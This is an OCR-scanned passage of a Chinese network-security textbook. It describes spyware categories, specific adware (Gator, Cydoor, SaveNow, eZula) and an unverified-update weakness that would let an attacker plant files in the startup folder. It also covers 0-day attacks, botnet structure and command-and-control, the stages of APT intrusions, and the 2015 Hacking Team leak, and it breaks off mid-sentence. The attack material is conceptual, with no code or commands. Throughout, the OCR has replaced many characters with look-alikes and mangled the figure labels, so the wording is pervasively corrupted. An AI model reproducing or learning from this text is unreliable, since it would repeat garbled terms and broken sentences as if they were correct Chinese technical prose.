与 Web 站 点 签订 合同 将 这 种 bug 放 入 他 们 的 网 页 。Cookies 和 Webbugs 类 型 的 间 诬 软 
件 是 纯 被 动 形 式 的 间 诬 软件 ,它们 没有 包含 自己 的 代码 ,而 是 依赖 于 现 有 Web 浏览 如 的 
功能 。 

(2) 浏览 硕 绑 避 类 : 绑架 软件 第 见 的 绑架 方式 是 强制 揽 改 用 户 的 浏览 兰 衣 页 设 定 、 
搜索 页 设 定 或 其 他 浏 宽带 设置 。 绑 架 软 件 主要 是 针对 Windows 操作 系统 ,可 能 使 用 “ 安 
污 济 览 右 扩展 版 或 浏览 冀 辅 助 对 象 (Brower Helper Object,BHO)””“ 修 改 Windows 注册 
项 “ 百 接 修 改 或 代 蔡 训 览 硕 设 置 文件 ?等 几 种 机 制 中 的 一 种 ,以 达到 他 们 的 目的 。 例 如 ， 
在 使 用 Google 和 Yahoo 等 著名 搜索 引擎 搜索 时 出 现 某 些 弹 出 窗口 。 

(3) 击 键 记录 类 .; 击 键 记录 程序 最 开始 被 设计 成 记录 用 户 的 各 种 按键 ,以 便 发 现 密 
码 \ 信 用 卡号 码 和 其 他 敏感 信息 。 目 前 击 键 记录 程序 在 此 范围 上 进行 了 扩展 ,能 捕获 已 访 
问 过 的 区 点 ,捕获 印 时 通信 信息 ,甚至 能 以 快照 的 形式 记录 屏 攻 上 发 生 的 一 切 , 还 有 些 程 
序 能 将 击 键 字母 记录 到 根 目录 下 的 某 一 特定 文件 中 ,而 这 一 文件 可 以 用 文本 编辑 带 查 看 ， 
如 DOS 下 的 doskey, Windows 的 kevlog。 

(4) 跟 踩 类 : 跟 蹊 是 由 操作 系统 或 应 用 程序 对 用 户 执行 行为 的 信息 记录 ,如 大 多 数 
浏览 可 里 你 留 的 最 近 访 问 过 的 Web 站 点 列表 和 在 大 多 数 操作 系统 里 保留 的 最 近 打 开 的 
文件 和 执行 的 程序 的 列表 。 尽 管 跟 踊 程 序 本 和 号 是 没有 恶意 的 ,但 它 可 能 被 恶意 程序 利用 。 

(5) 恶意 软件 类 . 包括 病毒 .蠕虫 .特洛伊 木马 .月 动 电话 拨 号 (企图 拨 通 Modem, 以 
连 上 更 昂 贯 的 服务 ) 。 

(6) 间 诬 忠 类 . 间 读 虫 是 间谍 软件 的 原型 。 间 旋 虫 监视 用 户 的 行为 ,收集 活动 记录 
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并 将 这 些 信息 发 送 给 第 三 方 。 被 收集 信息 包括 Web 表单 的 字段 .E-mail 地 址 列表 、 已 访 
问 过 的 URL 列表 。 它 经 篆 被 当 作 浏览 疮 协助 程序 而 被 安 闻 ,可 能 在 主机 上 以 动态 链接 
库 (DLL) 存 在 ,或 者 可 能 作为 一 个 单独 的 程序 运行 ,而 不 管 主机 操作 系统 何 时 引导 。 

(7) 广告 软件 类 : 广告 软件 是 间 诬 虫 的 一 个 民 性 变种 , 它 显 示 广 告 并 收集 用 户 的 当 
前 活动 ,然后 隐秘 地 报告 汇总 给 第 三 方 。 

2) 间谍 软件 攻击 分 析 

在 通常 情况 下 , 当 访 问 一 个 包含 ActiveX 控件 的 Web 站 点 ,或 对 弹出 的 广告 和 E- 
mail 广告 作出 反应 ,或 安 猴 点 对 点 文件 共计 程序 时 , 间 诬 软件 会 在 系统 中 的 不 同位 置 安 
小 一 个 可 执行 文件 和 其 他 附属 文件 。 间 谍 软 件 大 多 以 应 用 程序 动态 链接 库 捆绑 方式 运 
行 , 或 者 以 浏览 需 捅 件 的 方式 安装 到 浏览 闫 上 ,一 般 的 用 户 很 难 发 现 它 们 。 为 了 更 次 入 地 
阐述 间谍 软件 的 攻击 方法 ,下 面 对 4 种 (Gator、Cydoor、SaveNow 及 eZula) 基 于 Windows 
的 传播 最 广泛 .最 隐蔽 的 间 旋 软件 进行 详细 分 析 。 

(1) Gator。 

Gator 是 一 个 收集 和 发 送 用 户 Web 活动 信息 的 广告 软件 。 它 的 目标 是 收集 统计 信 
息 并 生成 用 户 对 广告 的 感 兴趣 程度 。Gator 可 能 记录 用 户 访 问 过 的 URL ,识别 如 用 户 
名 、 邮 政 编码 、 用 户 机 各 上 的 配置 信息 以 及 已 安 疲 的 软件 等 信息 。Gator 也 能 跟 蹊 一 个 用 
户 访 问 过 的 站 点 , 当 特 定 信息 显示 在 屏幕 上 时 , 它 就 显示 它 的 日 标 。 

Gator 有 以 下 几 种 方式 安 猴 在 用 户 计算 机 上 : 当 用 户 安 狐 了 Claria 公司 (开发 Gator 
软件 的 公司 ) 开 发 的 几 个 免费 软件 中 的 一 个 时 ,如 一 个 免费 的 日 历 应 用 程序 或 一 个 时 间 同 
步 客 户 端 程序 ,应 用 程序 就 会 安装 Gator; 在 iMesh、Grokster 或 kazaa 等 点 对 点 的 文件 共 
享 客户 疹 , 也 捆绑 了 Gator, 当 用 户 访 问 这 些 站 点 时 ,一 些 Web 站 点 会 在 客户 端 弹出 广 
告 ,提示 用 户 下 载 含 有 Gator 的 软件 ;Gator 作为 一 个 动态 链接 库 运 行 , 而 这 个 动态 链接 
库 链 接 了 它 的 载体 一 一 免费 软件 ,或 者 从 一 个 可 执行 的 称 作 gain. exe 或 cmesys. exe 的 
文件 开始 执行 ,Gator 能 够 日 我 更 新 。 

(2) Cydoor。 

Cydoor 显示 目标 弹出 广告 ,广告 的 内 容 由 用 户 的 浏览 历史 确定 。 当 一 个 用 户 连 接 到 
Internet 时 ,Cydoor 客户 问 事 先 从 Cydoor 服务 硕 旋 取 广 告 。 无 论 用 户 什 么 时 候 ( 上 线 或 
下 线 ) 运 行 一 个 包含 Cydoor 的 应 用 程序 ,这 些 广 告 都 将 被 显示 。 为 外 ,Cydoor 收集 用 户 
访问 过 的 某 些 Web 站 点 的 信息 ,并 定期 将 这 些 数据 上 传 给 中 央 服 务 占 。 当 用 户 第 一 次 安 
装 包 含 了 Cydoor 的 程序 时 ,用 户 被 提示 填写 一 个 统计 问卷 ,问卷 内 容 被 发 送 到 Cydoor 
服务 大 。 

Cydoor 公司 (开发 Cydoor 软件 的 公司 ) 提 供 一 个 可 日 由 下 载 的 软件 开发 工具 
(SDK) ,这 个 工具 能 艇 入 在 任何 Windows 程序 的 Cydoor 动态 链接 库 中 ,隐秘 地 为 程序 的 
作者 市 来 广告 收入 。 

(3) SaveNow。 

SaveNow 监视 用 户 使 用 Web 浏览 硕 的 习惯 , 当 用 户 想 购买 茶 种 产品 时 ,触发 广告 的 
显示 。 尽 管 SaveNow 好 像 没 有 将 用 户 的 行为 信息 发 送 回 广告 商 或 第 三 方 , 但 它 确实 使 用 
了 已 收集 的 信息 服务 于 它 的 广告 。SaveNow 将 定期 联系 外 部 服务 器 ,以 更 新 隐藏 的 广告 
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和 它 的 触发 右 , 并 将 更 新 可 执行 的 图 像 。 今天 最 流行 的 点 对 点 文件 共 译 系统 应 用 程 
序 Kazaa ,就 和 SaveNow 捆绑 在 一 起 。 


(4) eZula。 

eZula 将 它 日 届 放 在 一 个 客户 器 的 Web 浏览 硕 中 ,并 且 修 改 即 将 开始 的 HTML ,以 
便 从 指定 关键 字 建 立 与 广告 客户 的 链接 。 当 一 个 客户 端 感染 eZula 时 ,在 HTML 提交 给 
本 页 时 将 显示 和 突出 这 些 人 工 的 链接 。eZula 能 修改 现 有 的 HTML 链接 ,以 重 定 向 到 它 
目 己 的 广告 客户 。 在 几 个 流行 的 文件 共 至 应 用 程序 里 (如 Kazaa 和 LimeWire) 捆 绑 了 
eZula ,并 且 筷 也 能 作为 一 个 单独 的 工具 下 载 ,能 作为 一 个 单独 的 程序 (ezulamain. exe) 运 
行 。 它 含有 日 我 更 新 能 力 。 

广泛 传播 的 间 诬 软件 本 号 弱点 的 存在 会 加 速 间 诬 软 件 的 传播 ,产生 更 大 的 危害。 
在 间 诬 软件 Gator 和 eZula 里 就 存在 电 点 ,Gator 和 eZula 安 狐 由 代 公 (如 DLL) 和 数据 
(如 关键 字数 据 库 或 URLs) 组 成 ,这 两 个 程序 都 包含 日 我 更 新 机 制 ,这 就 允许 它们 从 一 
个 中 央 Web 站 点 下 载 更 新 的 代码 和 数据 。Gator 和 eZula 在 安 竣 数据 文件 更 新 方面 有 
一 个 弱点 ,为 了 更 新 数据 文件 ,Gator 和 eZula 从 它们 的 中 央 Web 站 点 下 载 了 压缩 的 文 
件 ,这 个 压缩 文件 从 包含 完全 合格 的 域名 的 URLs 处 获得 ,因此 程序 要 发 出 DNS 请 求 ， 
以 决定 要 连接 的 Web 服务 带 的 IP 地 址 ;下 载 一 个 压缩 包 后 ,Gator 和 eZula 将 其 解压 并 
释放 到 本 地 文件 系统 ,但 是 ,在 从 压缩 包 释 放 文 件 前 没有 程序 验证 下 载 包 的 真实 性 和 
完整 性 ;这 样 ,如 来 一 个 攻击 者 能 绑 架 下 载 用 的 TCP 连接 或 假冒 gator. com 或 ezula. 
com DNS 啊 应 ,攻击 者 就 能 使 受害 者 下 载 和 安 沪 他 的 压缩 包 , 通 过 构造 一 个 压 红 包 ,如 
果 它 里 的 文件 名 包含 绝对 路 径 或 相对 路 径 ,攻击 者 就 能 在 受害 者 文件 系统 的 目标 处 放 
置 一 个 文件 ,如 攻击 者 通过 构造 一 个 压缩 包 , 这 个 压缩 包 里 的 文件 名 包 售 到 startup 目 
录 的 路 径 ,这 样 攻击 者 驶 能 在 用 户 的 startup 目录 里 放置 一 个 收集 信息 的 可 执行 文件 ， 
这 驶 使 间 诛 软件 得 以 运行 。 


2 0dy 漏 洞 攻击 

在 计算 机 领域 中 ,0-day 通 稼 是 指 还 没有 补丁 的 漏洞 ,而 0-day 攻击 则 是 指 利用 这 种 
漏洞 进行 的 攻击 。0-day 漏洞 指 的 是 被 攻击 者 掌握 ,但 却 还 未 公开 或 软件 厂商 还 没有 发 
布 相应 补丁 的 软件 涯 洞 。0-day 肾 虫 ( 即 攻击 ) 是 指 对 这 一 类 漏洞 的 攻击 。 由 于 没有 补 
丁 , 大 量 主机 可 成 为 0-day 攻击 的 目标 。 而 由 于 没有 关于 漏洞 和 攻击 的 公开 信息 ,许多 人 
侵 检测 系统 也 很 难 对 0-day 攻击 进行 检测 ,特别 是 有 意 虚 避 检 测 系 统 的 0-day 攻击 。 因 
此 ,对 于 软件 厂商 和 用 户 来 说 ,0-day 攻击 是 危害 非常 大 的 一 类 攻击 。 据 安全 公司 Scan- 
Safe 的 报告 称 ,2008 年 其 所 捕获 的 恶意 代码 中 , 约 20% 为 0-day 攻击 。0-day 漏洞 甚至 在 
网 络 黑市 上 被 买卖 。 

可 以 想象 ,为 了 保持 0-day 漏洞 不 会 被 很 快 发 现 而 失去 其 强大 的 攻击 力 , 攻 击 者 在 实 
施 0-day 攻击 时 很 可 能 会 通过 一 些 技术 增强 攻击 的 隐蔽 性 , 尽 可 能 向 避 入 侵 检 测 系统 或 
防火 墙 等 。 另 外 ,由 于 越 来 越 多 的 网 络 攻击 都 有 其 经 济 利益 目的 ,因而 即便 不 是 针对 0- 
day 漏洞 ,也 会 尽量 隐藏 其 行 迹 。 目 前 , 0-day 的 主要 发 布 类 型 有 ISO、RIP 和 
Crack&.Keygen 3 种 。 
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128 僵尸 网 络 入 侵 


僵尸 网 络 是 攻击 者 出 于 恶意 目的 ,传播 僵尸 程序 控制 大 量 主 机 ,并 通过 一 对 多 的 命令 
与 控制 信道 组 成 的 网 络 。 人 僵尸 网 络 是 从 传统 恶意 代码 形态 包括 计算 机 和 病毒、 网络 蜂 虫 、, 特 
洛 伊 木 马 和 后 门 工 具 的 基础 上 进化 而 来 ,并 通过 相互 融合 发 展 而 成 的 目前 较 复 沫 的 攻击 
pr a 

由 于 为 攻击 者 提供 了 隐匿 .灵活 且 高 效 的 一 对 多 控制 机 制 ,僵尸 网 络 得 到 了 攻击 者 的 
育 睐 ,并 得 到 进一步 的 发 展 , 已 成 为 因特网 较 产 重 的 威胁 之 一 。 利 用 僵尸 网 络 ,攻击 者 可 
以 轻 匈 地 控制 成 干 上 万 台 主 机 对 因特网 任意 站 点 发 起 分 布 式 把 绝 服务 攻击 ,并 发 送 大 量 
垃圾 邮件 ,从 受 控 主机 上 委 取 敏感 信 息 或 进行 蛙 击 欺诈, 以 御 取 经 济 利益 。 

僵尸 网 络 是 在 网 络 是 里 ,特洛伊 森马、 后 门 工 具 等 传统 亚 意 代码 形 仿 的 基础 上 发 展 、 
融合 而 产生 的 一 种 新 型 攻击 方式 。 从 1999 年 第 一 个 具有 从 尸 网 络 特性 的 恶意 代码 Pretty 
Park 现 号 因特网 ,到 2002 年 因 SDbot 和 Agobot 源码 的 发 布 和 广泛 流传 ,僵尸 网 络 快速 
成 为 因特网 的 严重 安全 威胁 。 


1 僵尸 网 络 的 演化 过 程 

僵尸 网 络 的 历史 渊源 可 以 人 奶 计 到 1993 年 因特网 初期 在 IRC 聊天 网 络 中 出 现 的 Bot 
工具 一 一 Eggdrop, 它 实 为 实现 IRC 协议 聊天 网 络 中 的 告 能 程序 ,能 够 目 动 执行 如 防止 频 
道 被 滥用 管理 权限 ,记录 频 道 事 件 等 一 系列 功能 ,从 而 帮助 IRC 网 络 管理 员 更 方便 地 管 
理 这 些 聊天 网 络 。 

之 后 ,黑客 受到 民 性 Bot 工具 的 局 发 ,开始 编写 恶意 僵尸 程序 对 大 量 的 受害 主机 进行 
控制 ,以 利用 这 些 主机 资源 达到 恶意 日 的 。1999 年 6 月 ,在 因特网 上 出 现 的 Pretty Park 
首次 使 用 了 IRC 协议 构建 命令 与 控制 信道 ,从 而 成 为 第 一 个 恶意 伪 尸 程序。 之 后 ,IRC 
僵尸 程序 层出不穷 ,如 在 mIRC 客户 端 程序 上 通过 脚本 实现 的 GT-Bot、 开 源 发 布 并 广泛 
流传 的 Sdbot .具有 高 度 模块 化 设计 的 Agobot 等 ,这 使 得 IRC 成 为 构建 僵尸 网 络 命令 与 
控制 信 违 的 主流 协议 。 为 了 让 僵尸 网 络 更 具 隐 蔽 性 和 韦 性 ,黑客 不 断 对 僵尸 网 络 组 织 形 
式 进 行 创新 和 发 展 ,出 现 了 基于 P2P 及 HTTP 构建 命令 与 控制 信道 的 僵尸 程序 ,著名 的 
案例 包括 传播 后 通过 构建 P2P 网 络 支持 DDoS 攻击 的 Slapper, 使 用 随机 扫描 策略 寻找 邻 
居 节 点 的 Sinit、 基 于 WASTE 协议 构建 控制 信道 的 Phatbot 以 及 2004 年 5 月 出 现 的 基于 
HTTP 构建 控制 信道 的 Bobax 等 。 

随 着 僵尸 网 络 这 种 高 效 可 控 的 攻击 平台 得 到 广泛 的 认同 和 使 用 ,黑客 也 开始 将 传统 
的 各 类 恶意 代码 技术 融合 到 新 型 僵尸 程序 中 ,包括 蠕虫 主 动 传 播 技术 .邮件 病毒 传播 技 
术 、Rootkit 隐藏 技术 多 态 变 形 及 对 抗 分析 技 术 等 ,如 2004 年 爆发 的 Gaobot 和 Rbot ,这 
种 技术 融合 趋势 使 得 僵尸 网 络 的 功能 更 加 强大 ,传播 渠道 更 加 多 样 和 隐蔽 ,也 增加 了 防御 
者 对 僵尸 网 络 进行 发 现 . 跟 踪 和 防御 的 难度 。 

2 僵尸 网 络 的 功能 绪 构 

僵尸 网 络 是 一 个 不 可 控 的 网 络 , 它 不 是 物理 意义 上 具有 拓扑 结构 的 网 络 , 它 具有 一 定 
的 分 布 性 。 随 痢 僵尸 程序 的 不 断 传 播 ,不 断 有 新 的 被 僵尸 程序 感染 的 计算 机 添加 到 这 个 
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网 络 中 。 一 般 情况 下 ,僵尸 网 络 由 僵尸 计算 机 .命令 与 控制 服务 器 和 攻击 者 组 成 。 僵 尸 网 
络 典 型 结构 如 图 1-5 所 示 。 


勤 尸 程序 
“命令 与 控制 信道 四 — 
僵 忆 计算 机 。 二 

僵尸 程序 个 个、 僵尸 程序 ee 
跳板 计算 机 攻击 者 
UL 僵尸 程序 
僵尸 计算 机 = 

襄 ] 僵尸 计算 机 


僵尸 计算 机 
图 1-5 僵尸 网 络 典型 结构 
其 中 ,根据 命令 与 控制 信道 采用 协议 的 不 同 , 可 以 将 僵尸 网 络 分 为 基于 IRC 的 僵尸 
网 络 基于 P2P 的 僵尸 网 络 和 基于 HTTP 的 僵尸 网 络 。 
僵尸 程序 的 功能 模块 可 以 分 为 主体 功能 模块 和 辅助 功能 模块 ,如 图 1-6 所 示 。 主 体 
功能 模块 包括 实现 僵尸 网 络 定义 特性 的 命令 与 控制 模块 和 实现 网 络 传播 特性 的 传播 模 
块 ,而 包含 辅助 功能 模块 的 僵尸 程序 则 具有 更 强大 的 攻击 功能 和 更 好 的 生存 能 力 。 


命令 与 控制 模块 。 
主体 功能 模块 | 
— 传播 模块 
Ps 


| ”主机 控制 模块 
辅助 功能 模块 
下 载 与 更 新 模块 


躲避 检测 与 对 抗 分 析 模 块 


1-6 僵尸 程序 的 功能 模块 


主体 功能 模块 中 的 命令 与 控制 模块 作为 整个 僵尸 程序 的 核心 ,实现 与 僵尸 网 络 控制 
锅 的 交互 ,接受 攻击 者 的 控制 命令 ,进行 解析 和 执行 ,并 将 执行 结果 反馈 给 僵尸 网 络 控制 
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化。 传播 模块 通过 各 种 不 同 的 方式 将 僵尸 程序 传播 到 新 的 主机 ,使 其 加 入 僵尸 网 络 接受 
攻击 者 的 控制 ,从 而 扩展 僵尸 网 络 的 规模 。 僵 尸 程序 可 以 按照 传播 肛 略 分 为 目 动 传播 型 
僵尸 程序 和 受 控 传播 型 僵尸 程序 两 大 类 ,而 僵尸 程序 的 传播 方式 包括 通过 远程 攻击 软件 
漏洞 传播 、 扫 描 NetBIOS 罚 密 码 传播 ,扫描 恶意 代码 留 下 的 后 门 进行 传播 、 通 过 发 送 邮 件 
病毒 传播 通过 文件 系统 共 至 传播 等 。 此 外 ,最 新 的 僵尸 程序 也 已 经 开始 结合 即时 通信 和 软 
件 和 P2P 文件 共 至 软件 进行 传播 。 

辅助 功能 模块 是 对 僵尸 程序 除 主体 功能 外 其 他 功能 的 归纳 ,主要 包括 信息 穷 取 、 僵 忆 
主机 控制 .下 载 与 更 新 \ 吻 避 检 测 与 对 抗 分 析 等 功能 模块 。 

(1) 信息 午 取 模块 用 于 获取 受 控 主机 信息 (包括 系统 资源 情况 .进程 列表 .开局 时 间 、 
网 络 市 宽 和 速度 情况 等 ) ,以 及 搜索 并 午 取 受 控 主机 上 有 价值 的 敏感 信息 (如 软件 注册 码 、 
电子 邮件 列表 .账号 口令 等 )。 

(2) 僵尸 主机 控制 模块 是 攻击 着 利用 受 控 的 大 量 僵 记 主机 完成 各 种 不 同 攻击 目标 的 
模块 集合 。 目 前 ,主流 僵尸 程序 中 实现 的 僵尸 主机 控制 模块 包括 DDos 攻击 模块 架设 服 
务 模块 发 送 垃 圾 邮件 模块 以 及 单 击 其 证 模块 等 。 

(3) 下 载 与 玩 新 模块 为 攻击 者 提供 回 受 控 主 机 注入 二 次 感染 代码 以 及 更 新 侍 已 程 序 
的 功能 ,使 其 能 够 随时 在 僵尸 网 络 控制 的 大 量 主机 上 更 新 和 涤 加 僵尸 程序 以 及 其 他 恶意 
代码 ,以 实现 不 同 的 攻击 目的 。 

(4) 躲避 检测 与 对 抗 分 析 模 块 ,包括 对 僵尸 程序 的 多 仿 、 变 形 、. 加密 .通过 Rootkit 方 
式 进行 实体 隐藏 ,以 及 检查 debugger 的 存在 .识别 虚拟 机 环境 . 杀 死 反 病 毒 进程 .阻止 反 
病毒 软件 升级 等 功能 ,其 目标 是 使 得 僵尸 程序 能 够 躲避 受 欣 主 机 的 使 用 者 和 反 病 毒 软件 
的 检测 ,并 对 抗 病毒 分 析 师 进行 分 析 , 从 而 提高 僵尸 网 络 的 生存 能 力 。 

HTTP 僵尸 网 络 与 IRC 僵尸 网 络 的 功能 结构 相似 ,不 同 的 仅 是 HTTP 僵尸 网 络 控 
制 希 是 以 Web 网 站 方式 构建 。 相 应 地 ,僵尸 程序 中 的 命令 与 控制 模块 通过 HTTP 向 控 
制 各 注册 并 获取 控制 命令 。 在 P2P 僵尸 网 络 中 ,由 于 P2P 网 络 本 吴 具 有 的 对 等 万 点 特 
性 ,不 存在 只 充当 服务 天 角色 的 僵尸 网 络 控制 项 ,而 是 由 P2P 僵尸 程序 同时 奈 担 客户 疾 
和 服务 器 的 双重 角色 。P2P 僵尸 程序 与 传统 僵尸 程序 的 差异 在 于 其 核心 模块 一 一 命令 杜 
控制 模块 的 实现 机 制 不 同 ,如 Phatbot 僵尸 程序 是 在 基于 IRC 协议 构建 命令 与 控制 信道 
的 Agobot 基础 上 ,通过 采用 AOL 的 开源 P2P WASTE 重新 实现 其 命令 与 控制 模块 ,从 
而 可 以 构建 更 难 跟踪 和 反 制 的 P2P 僵尸 网 络 。 


3 僵尸 网 络 的 工作 机 制 

IRC 僵尸 网 络 的 工作 机 制 如 图 1-7 所 示 : 由 攻 击 者 通过 各 种 传播 方式 使 得 易 感 主机 
感染 僵尸 程序 ; 包 僵 尸 程序 以 特定 格式 随机 产生 的 用 户 名 和 了 昵称 尝试 加 入 指定 的 IRC 命 
令 与 控制 服务 器 ; 3 攻击 者 通常 使 用 动态 域名 服务 将 伪 尸 程序 连接 的 域名 映射 到 其 所 控 
制 的 多 台 IRC 服务 右上 ,从 而 避免 由 于 单一 C&C 服务 右 被 摧毁 后 导致 整个 僵尸 网 络 瘫 
痪 的 情况 ; 由 僵尸 主机 加 入 到 攻击 者 私有 的 IRC 命令 与 控制 信道 中 ; 包 加 入 控制 信道 中 
的 僵尸 主机 监听 控制 指令 ; 名 攻击 者 登录 并 加 入 到 IRC 命令 与 控制 信道 中 ,通过 认证 后 ， 
向 僵尸 网 络 发 出 对 网 络 目标 或 主机 发 起 的 信息 窃取 、 僵 尸 主机 控制 和 DDoS 攻击 等 各 种 
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控制 指令 ; 僵尸 主机 接受 指令 ,并 调用 对 应 模块 执行 指令 ,从 而 完成 攻击 者 的 攻击 日 
。 其 他 新 型 僵尸 网 络 的 工作 机 制 与 IRC 僵尸 网 络 类 似 , 主 要 差异 在 于 命令 与 控制 机 制 


的 
的 不 同 。 
僵尸 网 络 
四 由 加 入 控制 信道 
IRC 服务 器 
i Ci Cj 
= SS Ss 
N | 
加 动态 IRC 服务 器 映射 
目标 主机 易 感 主机 C&C 服务 器 
山 疾 透 、 感 染 候 尸 程序 
已 请 求 加 入 @ 请 求 加 入 一 一 
一 (5) 监听 控制 指令 
一 一 一 (6) 控制 措 令 
实施 信息 窃取 、 
主机 控制 、DDoS 
攻击 等 行为 
图 1-7 量 尸 网 络 的 工作 机 制 
129 APET 攻 击 


当今 ,网 络 系统 面临 着 越 来 越 严 重 的 安全 挑战 ,在 众多 的 安全 挑战 中 ,一 种 具有 组 织 
性 特定 目标 性 以 及 长 时 间 持 续 性 的 新 型 网 络 攻击 日 益 独 锋 , 国 际 上 常 称 为 高 级 持续 性 威 
胁 (Advanced Persistent Threat,APT) 攻 击 。 

APT 攻击 第 一 次 曝光 是 在 2010 年 的 Google“ 极 光 门 ”事件 。 在 此 次 APT 攻击 事件 
中 ,黑客 次 用 Google 员工 信任 人 的 邮件 问 该 员工 发 送 恶 意 链接 ,该 员工 单 击 恶 意 链接 后 
造成 下 浏览 带 洲 出 并 被 安 疤 监控 程序 ,黑客 持续 监听 并 获取 该 员工 的 账号 密码 后 ,成 功 
渗入 Google 邮件 服务 顺 ,进而 对 敏感 邮件 进行 筛选 并 禄 取 了 大 量 机 蜜 信息 。 此 后 ,APT 
攻击 事件 不 断 频 出 ,如 夜 龙 攻 击 、RSA Security ID 守 取 攻击 、 暗 鼠 攻 击 、 火焰 攻击 等 。 
APT 攻击 的 不 断 涌 现 给 传统 的 安全 防御 技术 审 到 巨大 挑战 ,许多 传统 的 防御 技术 在 
APT 攻击 过 程 中 丧失 了 防御 能 力 。 
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APT 攻击 是 一 种 以 商业 或 者 政治 目的 为 前 提 的 特定 攻击 ,其 通过 一 系列 具有 针对 性 
的 攻击 行为 获取 茶 个 组 织 甚至 国家 的 重要 信息 ,特别 是 针对 国家 重要 的 基础 设施 和 单位 
开展 攻击 ,包括 能 源 .电力 、 金 融 . 国 防 等 。APT 攻击 常 采用 多 种 攻击 技术 手段 ,包括 一 些 
最 先进 的 手段 和 社会 工程 学 方法 ,并 通过 长 时 间 持 续 性 的 网 络 渗透 ,一步 步 获 取 内 部 网 络 
权限 ,此 后 便 长 期 潜伏 在 内 部 网 络 , 不 断 收 集 各 种 信息 ,直至 和 贸 取 重要 情报 。 

一 般 地 ,APT 攻击 过 程 可 概括 为 3 个 阶段 : 攻击 前 的 准备 阶段 攻击 入 侵 阶 段 和 持 
续 攻 击 阶段 ,具体 又 可 细 分 为 5 个 步骤 : 情报 收集 、 防 线 突破 .通道 建立 、 横 加 渗透 、 信 息 
收集 及 外 传 。APT 攻击 过 程 如 图 1-8 所 示 。 


后 续 破 坏 
攻击 前 的 准备 攻击 人 侵 


出 信息 收集 
| 及 外 传 
DGG 


图 1-8 APT 攻击 过 程 


1 情报 收集 

实施 攻击 前 ,攻击 者 会 针对 特定 组 织 的 网 络 系统 和 相关 员工 展开 大 量 的 信息 搜集 。 
信息 搜集 方法 多 种 多 样 ,通常 包括 搜索 引擎 . 疏 网 系统 .网络 隐 项 扫 措 、 社 会 工程 学 方法 等 
方式 。 信 息 来 源 包 括 相 关 员 工 的 微 博 、 博 客 、 社 交 网 站 、 公 司 网 站 ,其 至 通过 某 些 渠道 购买 
相关 信息 (如 公司 通讯 录 等 )。 攻 击 者 通过 对 这 些 信息 的 分 析 , 可 以 清晰 地 了 解 攻击 目标 
使 用 的 应 用 ,防御 软件 ,组 织 内 部 架构 和 人 员 关 系 , 核 心 资产 的 存放 情况 等 。 于 是 ,攻击 者 
针对 特定 目标 (一 般 是 内 部 员工 ) 使 用 的 应 用 软件 寻找 漏洞 ,并 结合 特定 目标 使 用 的 杀毒 
软件 .防火 墙 等 设计 特定 木马 /恶意 代码 以 绕 过 防御 。 同 时 ,攻击 者 搭建 好 人 侵 服 务 器 , 开 
展 技术 准备 工作 。 


2 防线 突破 

攻击 者 完成 情报 收集 和 技术 准备 后 , 便 开 始 采 用 木马 /恶意 代码 攻击 特定 员工 的 个 人 
计算 机 ,攻击 方法 主要 有 : 员 社 会 工程 学 方法 ,如 电子 邮件 攻击 ,攻击 者 窃取 与 特定 员工 
有 关系 的 人 员 ( 如 领导 、 同 事 . 朋 友 等 ) 的 电子 邮箱 ,冒充 发 件 人 给 该 员工 发 送 带 有 恶意 代 
码 附件 的 邮件 ,一旦 该 员工 打开 附件 ,员工 计算 机 便 感染 了 恶意 软件 。 包 远程 漏洞 攻击 方 
法 ,如 网 站 挂 马 攻击 ,攻击 者 在 员工 经 稼 访问 的 网 站 上 放置 木马 , 当 员 工 再 次 访问 该 网 站 
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时 ,个 人 计算 机 便 受到 网 页 代码 攻击 。 由 于 这 些 恶 意 软件 针对 的 是 系统 未 知 漏洞 并 被 特 
殊 处 理 , 因 此 现 有 的 杀毒 软件 和 防火 墙 均 无 法 察觉 ,攻击 者 便 能 逐渐 获取 个 人 计算 机 权 
限 , 最 后 直至 控制 个 人 计算 机 。 

3 通 中 建立 

人 [计算 机 后 ,在 员工 计算 机 与 人 侵 服 务 器 之 间 开 始 建立 
命令 控制 通道 。 通 常 ,命令 控制 通道 采用 HTTP/HTTPS 等 协议 构建 ,以 突破 计算 机 系 
统 防 火 墙 等 安全 设备 。 一 旦 攻击 者 完成 通道 建立 ,攻击 者 通过 发 送 控制 命令 检查 植 人 的 
恶意 软件 是 否 遭 受 查 杀 ,并 在 恶意 软件 被 安全 软件 检测 到 之 前 ,对 亚 意 软件 进行 版 本 升 
级 ,以 降低 被 发 现 的 概率 。 


4 横 回 渗透 

人 侵 和 控制 员工 个 人 计算 机 并 不 是 攻击 者 的 最 终 目 的 ,攻击 者 会 来 用 口令 祝 听 、 漏 洞 
攻击 等 多 种 渗透 方法 符 试 进一步 人 侵 组 织 内 部 更 多 的 个 人 计算 机 和 服务 硕 , 同 时 不 断 提 
升 目 己 的 权限 ,以 求 控 制 更 多 的 计算 机 和 服务 硕 , 二 至 获得 核心 计算 机 和 服务 硕 的 欣 
制 权 。 


5 信息 收集 及 外 传 

攻击 者 稼 第 长 期 光伏 ,并 不 断 实 行 网 络 内 部 横 回 渗透 ,通过 妆 口 扫 质 等 方式 获取 服务 
需 或 设备 上 有 价值 的 信息 ,针对 个 人 计算 机 通过 列表 命令 等 方式 获取 文档 列表 信息 等 。 
攻击 者 会 将 内 部 某 个 服务 佛 作 为 资料 暂 存 的 服务 右 , 然 后 通过 整理 压缩、 加 密 、 打 包 的 方 
式 ,利用 建立 的 隐蔽 通信 通道 将 信息 进行 外 传 。 获 取 到 这 些 信 息 后 ,攻击 者 会 对 这 些 信 息 
数据 进行 分 析 识 别 ,并 做 出 最 终 的 判断 ,甚至 实施 网 络 攻击 破坏 。 


13 典型 的 网 络 入 侵 事 件 


1 HadineTIeam 被 黑 ， 互 联网 军火 "泄露 

2015 年 7 月 初 ,有 “互联 网 军火 库 ” 之 称 的 意大利 监控 软件 厂商 Hacking Team 被 黑 
客 攻击 ,400GB 内 部 数据 泄露 。 据 了 解 ,Hacking Team 掌握 的 大 量 漏洞 和 攻击 工具 也 暴 
露 在 这 400GB 数据 中 。 更 可 怕 的 是 ,泄露 的 数据 可 以 在 互联 网 上 公开 下 载 和 传播 。 业 内 
人 士 担忧 : 一 旦 泄露 数据 广泛 流传 ,将 造成 全 世界 黑客 "人手 一 份 核武 硕 ” 的 局 面 , 很 可 能 
使 世界 安全 形势 迅速 恶化 。 


2 全 球 数据 服务 集团 益 百 利 公 司 的 计算 机 遭 到 黑客 入 侵 
2015 年 10 月 1 日 ,美国 移动 电话 服务 公司 T-Mobile 发 出 通告 说 ,为 T-Mobile 公司 
